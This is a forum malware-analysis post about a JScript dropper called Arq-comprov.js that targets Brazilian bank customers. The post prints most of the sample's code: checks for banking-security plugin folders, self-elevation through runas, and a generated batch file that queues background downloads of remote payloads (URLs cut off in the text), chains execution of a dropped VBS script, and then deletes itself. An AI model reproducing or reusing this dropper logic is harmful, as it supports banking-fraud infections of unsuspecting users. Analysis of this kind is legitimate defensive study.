Malware Analysis 4/54 Arq-comprov.js - Sample targeting Brasilian Banks

DardiM

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/05-11-2016-7.65155/
Thanks to @Daniel Hidalgo

Arq-comprov.js

Why this sample ?

It uses a poor obfuscation, but the way it is done, it's interesting.

.js => 2 .bat + 3 .vbs
1) What it looks like :

I can't post here a spoiler of whole code : too long :

So I have removed all the comment parts, and let some codes :

Look at the spoiler part !
var Nv3RU90Lt5ZG = new ActiveXObject("Scripting.FileSystemObject");

var j3Tezo2PL9ok = new ActiveXObject("wscript.shell");

var p4KBH5u64vNz = "gbplugin";

var go6xt1m8jIZKV = "scpbrad";

var lg9Ba493sIk = false;

var CYjK6el1 = false;

L2jl14qQMb = j3Tezo2PL9ok.ExpandEnvironmentStrings("%PROGRAMFILES(x86)%");

FKQRd91EjgEw8 = j3Tezo2PL9ok.ExpandEnvironmentStrings("%PROGRAMFILES%");

if (Nv3RU90Lt5ZG.FolderExists(L2jl14qQMb)) {

if (Nv3RU90Lt5ZG.FolderExists(L2jl14qQMb + "\\" + p4KBH5u64vNz))

{

lg9Ba493sIk = true;

}

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + go6xt1m8jIZKV))

{

CYjK6el1 = true;

}

if (lg9Ba493sIk == false && CYjK6el1 == false)

{

WScript.Echo("Error Unknow");

WScript.Quit();

}


} else {

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + p4KBH5u64vNz))

{
lg9Ba493sIk = true;

}

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + go6xt1m8jIZKV))
{


CYjK6el1 = true;

}

if (lg9Ba493sIk == false && CYjK6el1 == false)

{

WScript.Echo("Error Unknow");

WScript.Quit();

}

}


MjldoqNZhAokOT3DA = j3Tezo2PL9ok.ExpandEnvironmentStrings("%SYSTEMROOT%") + "/e0HbvG3WG";

if (WScript.Arguments.Count() == 0) {

var Koz6CN1gH = new ActiveXObject("Shell.Application");

while (!Nv3RU90Lt5ZG.FileExists(MjldoqNZhAokOT3DA)) {

Koz6CN1gH.ShellExecute("wscript.exe", "\"" + WScript.ScriptFullName + "\"" + " /a4gyFwxb6St0QHv1n", "", "runas", 1);

WScript.Sleep(10000);

}

WScript.Sleep(20000);

j3Tezo2PL9ok.Run('%SYSTEMROOT%\\notepad.exe', 0, false);


WScript.Quit();

}


try

{

Nv3RU90Lt5ZG.CreateFolder(j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps");

} catch (zc2Gj6bZLhiem8)

{}


var z4cwrnc7 = Nv3RU90Lt5ZG.CreateTextFile(MjldoqNZhAokOT3DA, true);

z4cwrnc7.Close();

IDxyPFq3XxAOsK4kEF = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\UQv5OyjGx1f.bat";

j5tq1MW730 = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\v5KT1ENIDUVo.bat";

eUKbZgnryU = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\ngx2uq.vbs";
var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(IDxyPFq3XxAOsK4kEF);

R9cs39N4.WriteLine("@echo off");

R9cs39N4.WriteLine("::dWwRQ3816S2HWCpe0JK9HqEUh3J1aX4U2Umf0kpQ2nlFi51pAmb3pEBUs0vvur9zCKV4o36CLVR0BFcKaArenAHKAuTLg8TF99nk5G1k0ZPIbxQP732uoPaFxG227h4Ph3o3x5I1qPaY0ZYU9xP0cxp8WZbI5F2f5It8wqmX58Cw0j1RqWu9FTh7Z3RNdl833eagobj6dpr1yL6QJSGMxDXcDKo4loscGsICLms1emXQUoBH8S3ZGt3dAz6gCbE0h2iQrAhGEVf0RqaL901Aro23lkA3vGdmZiffnMiSRtyAIxxUcd01DeXXd8p9zAu7eE7DbB3KrTK7J9U30QmEh73kOfTOczigUPqc16j3pDVz2GipC98q4ssSDa9U02CTU6cvwGqrOs94T89fahI8v6q3hwrDF8X85Y54ND4ZGz37isuRG95fKBmgcyG17pmUK2qy93fSH5Zv2eYvxdbzWlLfaFrHAzhUhxFFo9CuqLODHK8q02rOJo3dYzt7lmuiBY7wOlujYYv9lZ39x899cg1m1rgcUQo5LD5D7PzR579923c0A4poUcOTyRry7XdGy7FBicDkcpUPFHmOYrCIc3jUi5iOe2EXfR7G6fx2R8tQ99YCTD6n389F0YymkkwNiOZ0ALQfnsq5IwO0N5TMq4aNVhhNE9ajhbr7PkvlsjrLvJNvVE5Liu2z6Wd41dp6o9OvWEkHdT7MQ3q1pCS1QB2BU8zWuI2opY4cm7Rpa0NZCUHMhcYEiqhbcEXBH2sCTeLt9N4GXeZyUuA911ndN5IHGEs4bl4ZhLZ9E6Op077541PnPAEdL3755U9k7cW5M8VlCsvvoT1Yuq86sQyU9O4Zlo2cLp9bT264lR5Hy4P3Oh2Z5i3Y4vbWQdB8vVD969fbo5YqNeDFr1J91Pad7XBZDb3xom198urTUefzMb7Yapzz37VdtuN8qUONl7mzsTVaj9G1yB77Qx02rRuNJJL2beoerPnvBaGa6Q4eeD71Bz1LyT065EP4gPbj4dRR49CKNiXW5w7UsFg5tzJ26mdBBf63hFOyLmE9h4P2Mu0FpMwbRz75WshH8v3r04A5hG1uQUdzez9qq4oTqAXz08glnL9S0IBfdwyWyK1p2RYFmmuXXW1wN1Vk1h22aJ7HKbesm5gnDjp17x3uuaq2T85ZmA8v2XNzCz4yARjTL01Xy0oTYUL3NHbvo8y8k26xKVc0QTR7Sqvstu4242koZEw22jiS2Myfi9uix9LOrkGwp82kaFYRl0FWWduH3P25xb5DAoZH77Uy04S1yS1TX8m81ErXZc3X7s0gWPKHHnotCGWQ1aH31H46mqZuJc2w75fK854Fa08Za95BP8n2abOS7Z84yZqUK0XnQNgipcu2O17TDSJSf7U0tz91PoWAha4LR6");


R9cs39N4.WriteLine("TIMEOUT 5");


R9cs39N4.WriteLine("%1 /Reset");

R9cs39N4.WriteLine("::vTX9tooDEcQJcWWW9uA5M4Yx44HSiSc30oO3VRI3PzkH65acq5U8fQIwPHmZhm3E00ZKO51jR3bQiwV5fx9Pv0CX6OMhuz8eYOruZB2YVAxoUeasGcv0HpUwg1q88Tu7n2DxBO4yo173RE22bBZuA8vGxwOZKQcnsYTKziqw668rh5GTtMDDtQy1QtI5s225K2GE5E0zqYQ628VL9e97BbF8dgEV6l7l81hDtJC59uH6j1fxU0rcbhEKENGLKhGQXajTakcU295I8cg322G4AVU2FYKHSqUM28cxU6X37ZaICsDdUWb2O113v9ZRYaLom5foTIu1p0H8hol1n3OC1u9vda6T07Xc7F00I56LyI7QvB5Xi036P281OJ8Yq7q7nUVH4tbR2qfO4s7jm8J3C0hSLhAdZAp1i2HBcJ29Q39oDA977zB8RgW3ZgzRhu39Snsv7SE14NhM5hr1W8kFzswWm22rRaT85eby6I3B97MMbLCZp27Wfk5DS8ZOIXXDk6ip74Cgs04Fvxv7shLR42CCl7y7ilR0fTm9RQfTpO2uH0M1Es4XsUSevWcUe8Hh1Gh0m8iY6c20AVoElSYZYgN4h4C18JOZfj7xdZ07nWKhu255F6B0Osh05FuZextx6GHlnHrH44efCjCj5geG3fGgK7AC8JNFH2wP1zSWkFNqrZkqfkc8CgiMHcN17bG7RtDrDKM902L3nSt9yW8V8mwWvpPrMIT6j0iKBbHkhrDxqCHpUXcOFnuoJcc6o4xFISmzMd8ylEGuilaTBDbL4dBrJax1Q5xXbd82jRlSOL8aS2ME5e0GBwC7hRros56uJc0mjTWZ1Gdl1274eRqB5uWe5nDPdwtXuD1YIcIE6E5jq3x740MG8Vt59iN11t5P29nei49f3OMYJbSYA3RJFEaC1u46lNwqvip0FU3V607bzg2oolZmZ4b3rO2EBT1dKg8hu1t722mUF6n03QXhTy89o16w355Na6mJ8FIXY6oZ7NbJWdEqlu89Oxm0VderbWJsVpk3bSiawpS4pidZonTdY6rqaRiX7aTTeasC83H1VYmbDB70uOe2x9pbM8HE9VQo6Wc80Lm9M1GxNP0Huj6FST4LvZdHWj7w4PnEolQIHYvxKJe6aElcFRYf69iLe7TYK2r7ldVDDI2tA29OrWB8yiP28ns1RUZJqAOnr42U40ZcCNP504JYSWV5jGfQGawItrAu161KMkTr9nX19RzIYSpEW4Y29KS3Xd42wa81khe8AjigwAjdBsFFAu1Ssty63T0z2rVCUfSXZR7sIQOx2bPG1kF8lYyAIlV6bvp5pHmegGZcH69EP52a52Ty8OCC47tr78y9Cu732471yPHaVyc4iJ1nocqihI8D8eolfrXVFPI7988o8umsg1990WOyDwSgmVBa1DLafsRU1fR5UZYRYOPvwxg7PDoxnonZkyoY1angCLEGMaojv2KM0gZhttUs09AvJz3cxEaG0Wt6BJh8NBwYU4JAD3ErpGyO1LY2MDLzNpQ13lo9UE667Y4N13A44yXYjY5iwD9rAliC0ay0Z5mPK4av3iWOzEbxlKIanzuMp09E4dH84UUd8JFqtX1ibGfD9vi9AYwV5wOX8UT8JNaDx776ryz1UWGUoWc0sD9ulIv7B93WNB6X1Zz6ndm3nZ6bdckIQZZyie8hg6pjyIxV78FUJjWy645kwJ4yLk49Jl0rz9y06MEBX4MC2aC2U8rSsxbQ5DhN9qu3660nzR12advAOY9Bx2Kqo2NH9aPM3zt9xqU2V2Tg31MDv5aqv3R6FI7kyvyn6ilBjRBw5Ek6t2mhwGVIr4xNXF4");

R9cs39N4.WriteLine("%1 /Create NZrk3biH7Y");

R9cs39N4.WriteLine("::I13S978SLMK87rS12cA3b2TVKOnlja0QCzer63RCGUs26ElZka8MUeoLKMQPax0qCz6G7ySm78R1wxJQ6MVtEt6qUyYd5SqJvmmdD9Nh7798X9KBBsKaGhxfe02y0Uw6ilI9z022hK6rAwZ2KLs1pzZ5nqEK19RXNokcP7tVMRfmRaB2Jqq3Vgk8ZZ87n6P20Ye6JO8K6njTTLUJx6y2lTi5KmAKSRMrNPTu7XG5F0IaiRP57pxq8iFZf2b83Ktd9Iw7BOXU7jj1eYK2L1EclV0OhxYEtZjp04hY2cFyo6h5sI8kEF07lQ54caA06arTcjg4Ti59J7SOOfd0xq7H4erqmBOBm688uoYJjklGHQ3tg9I4iKHc8g8wzG0HHDIdjo36TtvzH8gNp8SQZWhdzHQs55rR3S37qwYtkIQ9yarFSnJ6anDZ3naVM3NHne68XKAfz0m4ph9YxYv8NplsIxeQpbJQbuiRxa3QzMEGHxCy6GNZ10wxwp3D23N9L1mK1OV5382Ojf9jZ9lHOIfts5EfqtXoYtLkJRS4IWViwqieIcrhc0M9R4E3tRfmWFL7sXEQTqvpGwclil4II1E8o42kzah5STLAcKFdns6qwJqFRBps5zrSIQm5koz85NW0F1ibpHfwmm5U9sObg38Q546FWlgTjM9V92Muj0MkUoloc0ureCAETpMP696DNXatHWw1Ov47fQ9B2ioLOTkczs41pvCKvacmd99uRCIAem7OI49aTP66eYYt18z0e6vRbS9OPP0rp3Cb6FDM430i9KkcocK2yXDKGF0kf9BTkOk0ARESmPu9P0lLU2ekzAiK47640i56JDX");


R9cs39N4.WriteLine("%1 /SetNotifyFlags NZrk3biH7Y 1");

R9cs39N4.WriteLine("::b403ylk6Mf9yuLKwxgl6KjI5uOZYI2EtnKPxTr1MfAGvbkWdYEy7fx82kxSKCLt7xlacV1MQVV7pMGya159aXK7xQW604MPeD76S20KMTExs0nYbvU2djQ93oAuMev1b97Nk187lvlnMx7fTc86RK5D9NpUHpf09eo3kXG6GcK6itl7cSwtXjYDTtjZhh5b8oWcONCuTvD803Trd27bNmk67k0Ke7QBPTPemE86nA1MccPz1mgBFz5qw7611nudE6z2tQytRh2o5gNajQBCg22HvnsvV7a1q6fb23hiX09K4M46Q71VCuO2wwPh69u14QGCF5w1dOd2n2VS11F541UQFdssB0ZDxTbdhX860p0qVMJ1NW8e1tG1oBlz260wxNlo7p3WqQdANj5roIRE52P56fFhyvTD4vTY32K39COdB1Zb55oZ92ia8l2cN3VZ3P7I4F1GKlSrQxB0zQrwc9YGyVWU4rcKKNo7tZl9V83Ha9GMMd9vjL49Nea48WmRe4OdCh8bt7D25BtqQ4eHEmS0W9pSHvCP56v9TUy7S2lHp1WnQq173287EgIF7cRSw95vdSOIxS6bYDcjELeppTsB2CY3iHjGyDs1zHiHEpvp3Zry603x334OCbHeSiy3BFv1Gm5lyIS446yCELLE7vgBXfOD93260p64n76TG259v95mH8Ns0lq8qLup1k6u8murEp42O0HC5yUc2Jcn8hO5Emi62K8ud2KTCPvES3ABZ8rKT3ncJlZmtfPKmPiIiRuFqzAhq0tA1bo7a3Xnq4O9IFk1I4bBmv1P8NvgTw7jB76Px16Rpdq6xYCg10MYXYS3C64Z93A9aJL5VX9VdlcEm37wXgFyHw8NXKi1MVvRoki7WyP8p44O6q2S162EpN35RuQEU708jQxMSV5KiEMqax9y405SovRvEb80l5D7v88cs4872akI64u6VnoLoXPRUJ8O3hy35jQZ4O1c1QU0PK30o06PCgVC5HDJR2Ab6VP89D2FPpk35C1q0D4kHncyMWO2K8VoT3M2C1oiJuEpq06250552QjeO1Ty1RlUd3X6DxG50cMlt74w5G6f111yoC0np9V117Y1sSGX7Rxo3IFGvXwxn6Q6xPp9cQS5271Hqn1IpZY38UzSTE69H59IZefXEOH9qgu45m64JK1gx0vtEU1mJNlfb9XOjtYtJR85OG5k9Su8sm06XteAnu3477BqOM4VYC5nanDaBpt946f0Qiw7oECMCd20bS9vj3vWvy35Z3ef7OEWo3sw1y442cXmy04KZv6UF4sc8DUjW3wELYi1bs2qH88X282839glGO6My263XB9l2jfA2iRzRSo36F7C316YqdE58HtqC7I48F4COyLhou6qOH4S3aPBQjJbZ65c9oRM7Q3de6t02Q9Qjs1Gxs81qkn9BIPvppE3092RaYmllg2zWhfYD1931p9c0jVCqrnf6D9b1o6husnqvmCvp35YCZp316TDcBr1BatwVog0pZDWNv657CO69Ljvmi1Ekmt4cWh464QSYQ8iHd3BLyWILJ08kF7ZYXHIu9oKEl3iE8gj7JcBw0D3iMm0oCuVMKUr92R9hCGfe11E6raLk1rLfNf20si5o0nCE7YKH2IZG0tR1kUL2Iea2o8Vxpm6565Mj0WHIKcH6z4cZ42VuAu67BHWeQVa1ELpwB312fEA25n3JuARY28LtJ4mB1Jw1iyh0NcHSp05bZV5smDngMZcjDnCGnC3BsuewBZ0798f8b3bzTgeY8JWtxusS8j10afgiI3cRXRnCWsHcFudJv1J4VkuF8Qlqvtw89iT5zZZpST6On0iim3FZgjVYDZp1oUa165jY2zihws6lnnH8I02w5TrQ9a119S3PKShK66vWv0wZV39ZcZ7qX88y0Zi1JSR0JXwq345a12aVmEuVv9bbH8HHw9999HguKwf51026sHw1c60XKH8DWVBu9Jk4A253WC3pzu8GVSr7n2vgl1bh5VF2ajEu4BOMFMLEl4RqaJKsgKbJhO21DlLiM1EvgNZnM5E1oGYNR8cO1s7RK6gNOgi8Y3vAbJ0L6FkekWV9925mitwbPS3Sy0t4Oc6BhETgk6yDLzcEiKKr2IKdtrO8jS9ZBu461052N9M0Kn307VF5745E3N2iQWMw1Xl5nIvvp32ARk2jdP8yCW13hn8M7MeJui7A7WarJ08n5e8DYnUXE6y0B6hAvZfDwgidh75yLzwLjV5Q0frhSu40d0BHCVSI192vYzIdsj8sHOx9MIYd1s2h58x2HG73A1mQ720zVuxOxSPkFH3pPVcXrJrx7Sp89Du3H0Y9ST3Ntovl70aYu1lHCG6lVkVD1gDWOt03VlN0469JRCrAWmdI5eEYZLaHMMcyZQPXfsSOP2H2vaNvG658tA4a83a43Xrsy3Eu6lNmZS6BrET9yTEsTtZ46ZxR334b6r3we36G3AK9425oe8L39IdnCrKsBax1CBDmX92ZD3651V13LuPAk3B4bDUZ633DMD55dY3G9A8TC5z2Y9xrED2hZWa24qSqXg5JGN9DnSHLGD3P5u7d7DkG5iwm7Eo2iC75fkqJT48X4y3TR2Y9FbMVH9a2kBUL46dT6M3VALpbDiCod6cVyUEIOLA67YL2fjVoc8C0cSrux0ieGyZEa3p82CADN74iGkN4kHEDF7XKcK96o7Kmo0W9I5ALbnD2hwSmmEyI3LI2qhwUAmMf48T0rZrkCSh6038ukGBLXLs95MV7Ojz2XVWWi6mDzj8Yf2K1V7N1DgG0305yQwA5SpZZNZ5DucFYP5UN6SmK1OS3UCxX99OUqK9UmgwUMC7OzVG3cD3ebtzWiHTu08MqK2dV3Lr9BfcfqcLvAMXcXYL9tew447AfldGCQF1tVpUDv7QoY1ZGXbesI3ZN3hINTUV3ly2RedN1zeAATFYZABuaXCA2qa4iys8LiiPOU6rzhvu2M5ag6LXoNI1lYp34DfMZMCbnE7jrk1dRVcaYIEjG723wjpi104B63dEjTeVqd3mP89RODB699zpHutVQ1Xu7loz9YTCIvuc7kJyRb2kW3YXaDvYyxo2Oee92jS3sWI0cJB8ctbXehKT354MYmB3UfZ9gvIoYTXuxv2NS2n9KXc7r8SKFbJnE54L1fZ9tcbqp24y8tZ6etbImik072Zx93754qD6D3dpKcF5JIIhFwoA6MHG0lDdt2FkDFHbW83L3s9GrMAc9sf45dlGlXqC56dn5AKd6Y999yxA37vaII4eVowkM6e0ok5TCS75R");

R9cs39N4.WriteLine("%1 /SetMinRetryDelay NZrk3biH7Y 240");

R9cs39N4.WriteLine("::HSYh9jgN6P8DG9RQ9LjakX4Z9aP56LcCjb5MdqYt2aiC37SHemb05zundViaulGxu64NMb94Z2tuvetAfnExBSxNkfO5oFwWrw2dPdV0QLs8AL4s91NuCJHipavgqQCl2xkPjd17bO08j0OZ1XmT9Eh46jkDyFhWgrFP9R16drkW7DLH3pFe9S2X7Z6v5iJx8F1JQid6ty6AHRvIpe5pdkA3wQ3NifrD6v4Yr4bi0ouQn8ASaH0neuPfpTOfd3GErSmu9UsAQ6mWL7d01Qn0H7xXn5XO0R67zP2xn4tG5PSXAC325CsZ4gzrOeeg12C0WGJH60Bq4MJGTKqt1YvmI0AV5ozEitvN0P9pzcpo9p6kl8ntg49iYNDKaNwXdc8w423b2G0M0dLC6Q8hY1OkNb1c6t7EorLgxRLo34m09J3jrlZ2wBbWVGdvmJfTPMUnMsag4Hrd2u56qkX7x1H4iG30YTjEM1LIKRy16i1m8666n14HNbvSxKbaFKiqnciI0IKbY3mnGM9OiaQrtms8e9nwg0tRufX4PiVQvWKoCQcL2k3JA8A7tx7ox0XusSgy2drteBvZ8B5lbC4LitbHiEdR0hqht79t6ddAI6eTJ5Hn7A6Jvs5m7os21vW0OIRe");



R9cs39N4.WriteLine("IF %PROCESSOR_ARCHITECTURE% == x86 (");


R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(") ELSE (");

R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(")");


R9cs39N4.WriteLine("::N2X6PmNRAZk7W19z8dRYXaLEK8yuy9Yf1AR326kqJJ7zAfUNC7GDl2NwU94i8G0x58rLFQC6ijyvSOZzzmQQ5Piks3J1s2V6Phc0Su8ukr1b2Ch7fMu08xtzB2kkubp994AaMcQ68tIX8caaE94M087k4BSjZML4Zi25GD9jc3f7G2cKPgV081gHNEBK67nIfiBRUA943Toa9crbdMJeUdNf3aQFuVPxMaez8LdtfXYU4bRB5om6xn9n8DbL5G68zgf2lC8v3Ml0ovZOtQPMxw6x8DNmUjZ7bRtOmv46Bgapp85NaE8D9y6RM96pTTepko5LRMaS6eNmivghVwMlqEs8g69304hMV3YFcNVvXbN9Eqh06q0m14h1552Zjll8Plb157QGvEnd0vK0WOfRJ5DuE8yH557M069dNFxdEX8R1IHY6662hDRzcGSfWDgbGARPF3fCfQnMbPSa5LubDT6uZgOnF8V4R7ndd8HqMS6aC4dUK4SZ6PZ8Y4Y8A2vuu5ESXATpmzfHdwvHK0UvUrSi5754N2fx53lZLj7SfI1UOcA3fvHVA1N6gUlwMnFHXsuoSiS59omn6NSeR0uhtEA3LVWexjk1V28vd9WuBpDRVTZXWzxvTY71xL56BAtzXKMirmampscHqNiZ6dwRx9doy0OV1Ng8J9H5I7Lk1nYgUOXbx88WT6R6d0VkCTip3pe0XqVQBbhIfTLX8JXwm60xWUOi72FSh92SmL523b48O7lpa1gNv22E5l93L9t5Wi9VOLondt38SSaPx1GOA61ruL5mXI0RjrwkGq82TX0cyyAom4V87Z6894K3162NzxxzIXsi99v4tYZ25FCLAeaZkK5mot3Zzh8S5YHpd3rSY6EiHK9D290XCYzk3E7G0dvkW7Ri5629F98eUKcidyX957K5l99bbjMf0m2i5IWpzK6GNv6CVY6z0rQSctoNFrIuCalzvT3R5fa3PXd6PGy5yCe46QJRJQO5OFY0xz5pR3YHy5BUXdd5beLst12p9022k9jhWI5dlH7V5fQU7c0v7Y0N22W7XRBS8btf8O1naMZ5mSStW2q9V6QMx7JGcI3nm7p4paoau23VxTSYRRvNjbzHw33I60sEGZ3p14jq18Av7C25Oc35w6v6ljua1cmk3U2kGtJJ7s21R1aJiGvXgeBeD81HsjpPBJWULq16N0SWwWb86L9Bn5rLmWxNzHk61y0DFdHpBwpwTcaM8wFAkgsGkY8r215EB0I5ElvK9");

R9cs39N4.WriteLine("IF %PROCESSOR_ARCHITECTURE% == x86 (");


R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:


R9cs39N4.WriteLine(") ELSE (");

R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(")");
R9cs39N4.WriteLine("::bCsT41my6GrbHrC4YW4qUq821iPyXuPaO55DVtF1giwVlXOZ5JvDbuVa9DF6f8I1bTzzd91uI40FDFtkr15Bymci1omJ52ct9xD2QFeSTmHjLdPtazhVT2pZO9AfF09O7kTjwXOCLMm01h4o5DyKF9F4GPnCRNHc8k578y4Qy9hF5xi5ftp33S51iRHJ5tI55t110OfS");

R9cs39N4.WriteLine("IF %PROCESSOR_ARCHITECTURE% == x86 (");

R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(") ELSE (");

R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(")");

R9cs39N4.WriteLine("::eTnCvF1zFJ70ovKEa5IZ8Vw88UttvR6f63PiHkg2tSx1n5ir1pQFVxng774fO98GF9Mpi39j0b7bu2I9KU148K77eZ25tLvdYl7h2Kidzk40E8easI5W0PzV0w9NR52K8uk71E92357MLN7Xi9i9yJi77Hw000fAEfTRVT7AEgRjLq3t5yR7l6jfkmh21RQk9fCRFYtXZYbMFKt1kVcnO1w1LkLjf5A18F99XT3X83mBXRxx2Hyy7aX9D29XdXbp2Zk5C6lWNvyAI3n3JX0HkiDc9ZH34F2cjePiziOK6V36Ww3CSGbHgUmfVFPEMqoAAbARt39s38dSR8BMoqdGWkeofHffu4gYzHq34F980oPPnGHoC6A02rOVYh2geKO9kPMHYl9SMHhe5u32VrWQyNarbXT4unXM0xnU8IJ0qt48p8k93Q78Uw8FaRPG1oDEgZRGPNdbkEuGnY9xRuFgM7vkmh5GubrzI9C0tub4KTC2RGK93O92Je42YLsth4B6669KaYBAQ8BlK2OqIzye4ylkJZ9hBBA7Z43U3R8iCk8yE3zFWO6YeL56lfjhQsfdw9mF5LDUUZDnvWXV0mWtrwdU0I9tVR");

R9cs39N4.WriteLine("IF %PROCESSOR_ARCHITECTURE% == x86 (");


R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(") ELSE (");


R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(")");

R9cs39N4.WriteLine("::qjXapV0273DfgG90CqpYCBIXQR2kn4znJyDFM1ejR6uJ8XkbRMTrqCqRKx53D2gApLony7WlvdgZr1XZedZA4GqGe8B8K8ij9wh5pvcZR22rr1KpGH2AM5ZUmOyZufeaU9x43RQAiNzd3Bq78jXP1h2ARuRvnt043Fy347ZEtW7WGh5Sud7xwDZN7JZJnWHRMr8Du287lnQd7Em9w15zE5KgHcsEUZNKEOI6y6YpHDxDagVTXkBed1OK5lFbV5n2S134x1vQeMEl9n35QdLdJpWTEDrrjXIvkl291y280H103nOfPkP5lWz5vDu97RQMrKm775e5XgBGMq33gKjRgrgB7855I4q8cD8PlH9l4pH41pD5GSgA5nE1QavRtRQIN13c9eUE1TCOmWM0hrJgynSg13nT8kunM3wk3eTysLi0JVerGJqAIxsk8KJSjd8995r5hFll9D10q4K43NUikEiX2c8B9OVN768jG50krzBor5O6rTTnQefEOGtRgInAkzXQaDHFxFanS7f30oFhs1eFeH5myi755Blth0SNIM51jVJJ00Ra5HhmTOqfCt6h29U3p6IDkrgOuG3rnbbZeKvLcwCj37fnE5P4hJeuRSz1kCYlhI8LTNDtEPjy6P1U31QnpqAGmFdPN7jE173Uj6Zc0P1fMVyHmcCY04UHjkua7l80yN2ESKuRJ5DBt7Q6M98uavc6avgoroyxDB1DuSg08wJ98Kw8dDY0R94p3aCSZMak5Vfkh1r3f79h904N4KA72zFym60nm9Ay9Stg230eLDU17xfvab0wsapZft8A9uvSOqKyXJ7YtZ7IX3h8qSGyoX2B3693j6Mmr8kv4nIDHzckDoXKYyMztuj5D5ZP91nbXj2ot8FAtmy1522aJ1FQS3gq3f4EP0Bo5rkZF0ImRbe12Dgw12BYxgJiA99CEEOzZdK8QmfOdt6ukQwlv0YZDTabL35uJjM79IPCanLF44uhMJZ3G02e17fUX5qZ9PJSfcDsTEAcV26ZcCKapFV8MLxA66pZQULjX1UmArXoA90682mGin5N93lohOSIpedFr62X5zwJYRZ69ZFtrFZNX9yjvcp7M4er9q2Z4UXM7TD4c58qmOn1kO7393xTNFmhQe5g9wRT3cGdm3FopHLKuZR331AJss1ZIWTL15mXQ8LKRrRoBOSBK9D7YS3kRAD7806Qv44vPWT3RPITN");

R9cs39N4.WriteLine('%1.exe /SetNotifyCmdLine NZrk3biH7Y "%comspec%" "cmd /c cscript.exe ' + eUKbZgnryU + '"');

R9cs39N4.WriteLine("::dMFK7zb9gVc2rjjGsh5hq8QJ222214KKHqeO48U7q8PgDrvqA0vs3gB4ZkFpk8KWhS3DIlihisAVZc94UXM9Mpqs8k7lPZkAwu9q7UhSbYENF5wxjruZjsdvYoNA9Xs7ytfRBFs9OANQbLAI8mGRzy9ITSivCtsUud3AKcu57tuCa56NxGqoI7vEcWBtF80vmOL0Vg2oYRyNbscXjDkK9apyi4A6qZfP7e2cefc24oo0stBOl1TYvcZ5x7H7FwD9lx06xNUZEmJkeCKWp54GAlXLY0uBoVj6dbYTX8DR8hY8wzaFwLQeAbtYapVQ6nyqxdnk3393zJtzG58O9bF32XQs28hSUpO6q8348r9FF0x8Ks19l6ItIRZ4TY29204Cx9GLn2DuiDYjilZ5OL2O");


R9cs39N4.WriteLine("%1 /Resume NZrk3biH7Y");
R9cs39N4.WriteLine("::wSZp4hi29tf1xBemIE0iYh1x0hxjK94cbTC7wgD0KHHu6IW65A3q2A28323YHkpTm490UBl6ynkPluLvdw7SsIWGJS5jrmgo2n59tMHbVi720IEVFuRYCW5zlmVLY6Eedtdkt5OwkMSUTf1dpAW1K78jM38E61998ewbL92P9u6dRE31V7HBPpsk6FV2zZq8bN3EUa4tsXTsI1O6MwHkW03tNq727F6k3e85VSseaZw57xaJP2P1bVfs0aTau24c6B5SAhE1a57XdSBYTnP3DTKoCXIKOZ5vQ4EzS84bhyO67E9BUEUL4vsquqawTHWrriJ8A6F8fBg60O42iJCp36ZHr04oj7kZ87iZ5eJf21FhI0N7lq59fKCg794WMDkfC32A3gD6y6GPM2Qdn9MvcTbdfy1EafRzSb4Oo6a8WbRZ5KSg96p2rPR0UoWEh2I9nUF60C7we58MtfTf26mUG1RI5naqV9Ji8d0B28mkXa5P0yM2zKyjUwK0TZyo3hh5jmD51tNjxey0cTF1iJkEZodBhFn7k5O3tSkN9PMwDet03srD5TPoEsrxxmeGNQ3ysYl7IQca0ob3GIPRWxf0EWA3i5FyRCHkTArYyEBGX41uGif6K0rK7B8j71i1Y4oJZO60nb3pBtrOl49QmH0Gnd3uX7CS2g3rpmFO4xIciELtooD96oE5z5rWRVhxxnbgRbc2956B9i4MhfEcDampYIG7lRoeE2u4fC8xDWEwvrB3AC542nFu1H08aDYvAL6YKiokcWDPNVKrF656QPoF018D0ZZ2wJjSe1yBll4rnDT9X7kN8S3aXHkSz72vhsxl57c4md5a652OtovXO4eyREZ1vaYAgacKL9RPrxdaKm12lWH7H6ckLFV32C5b0J8J131LafNGQx0OW9672eqky1v5J7bGzxHWoZsYkILFdz92VMu0x1Sr9owJuwQO2V9ggn2Bw6TfXey1K8442T1MB941n7B8Ns6qxhybox4CC1CX4M2FhvPJirg8u3U0kW4JMXbvL92unvJh05FyTrX3o67TUXYDuoo3YiMdV4Xv8J6fn9hSTiYOt5j4D3K4hzU30HGL8iZQTX07LSjQNfP9qLNdRR9U23hsgu2856Z3Lyv8E15QIJG7ymZGPS1pFzP6I1E6cT2T38Xa3pwD6ah724ZHHzMMv35i39MR6SUPbbhYn10wgW8Za6eBidJyE06Oz4ntZDco4hrk1YTGRj9VI65MFGS4FH5yATYkfLry9P2FpJv91Odfe8R9EkfrK9EjxZ48jNIoq1hIYP43NV86r8YDiZYQZ1T9v8sRiOvc6yDbBp9V3wrCRMGzhfK17mRln9lSlcA9Jo5TIynB5334wItLDhr4uX8O6151bSyt7LNYzR70GbqQn4R4DTH91n3V9PqMfm4nIz8GJzR0VgI0oLV26m5S9sfVT6pO4");

R9cs39N4.WriteLine('Erase "%0"');
